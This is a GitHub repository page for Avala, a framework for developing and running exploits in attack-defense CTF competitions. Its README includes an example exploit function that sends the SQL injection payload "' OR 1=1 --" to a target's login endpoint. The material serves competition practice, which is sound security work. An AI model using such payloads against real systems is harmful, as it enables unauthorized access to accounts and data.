Skip to content

dusanlazic/avala

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

228 Commits
.github/workflows
.github/workflows
 
 
client
client
 
 
dashboards
dashboards
 
 
docs
docs
 
 
extension
extension
 
 
server
server
 
 
.editorconfig
.editorconfig
 
 
.gitignore
.gitignore
 
 
CONTRIBUTING.md
CONTRIBUTING.md
 
 
LICENCE
LICENCE
 
 
README.md
README.md
 
 

Repository files navigation

Develop and run exploits rapidly in A/D

Build (PR develop -> release)

Avala is a specialized tool built for rapid developing, running and monitoring exploits in attack-defense CTF competitions. The goal of Avala is to take the technical burden off the team players, enabling them to focus on exploiting and patching vulnerabilities.

from avala import exploit
import json
import requests


@exploit(service="foobar")
def attack(target: str, flag_ids: str):
    url = f"http://{target}:5000/login"
    username = json.loads(flag_ids)["username"]

    payload = {"username": username, "password": "' OR 1=1 --"}
    response = requests.post(url, json=payload)

    return response.text

Development of Avala is heavily influenced by the practical experiences and valuable insights gathered by the Serbian National ECSC Team 🇷🇸, who use the tool in major A/D competitions such as European Cyber Security Challenge, FAUST CTF, ENOWARS, and more.

Documentation

Documentation is available at lazicdusan.com/avala.

About

⛰️ Avala — Exploit development and deployment framework for attack-defense CTF competitions

lazicdusan.com/avala/

Topics

python ctf ctf-tools attack-defense exploit-development

Resources

Readme

License

GPL-3.0 license

Contributing

Contributing
Activity

Stars

10 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases 1

v0.1.0 Latest
Sep 7, 2025

Contributors

Languages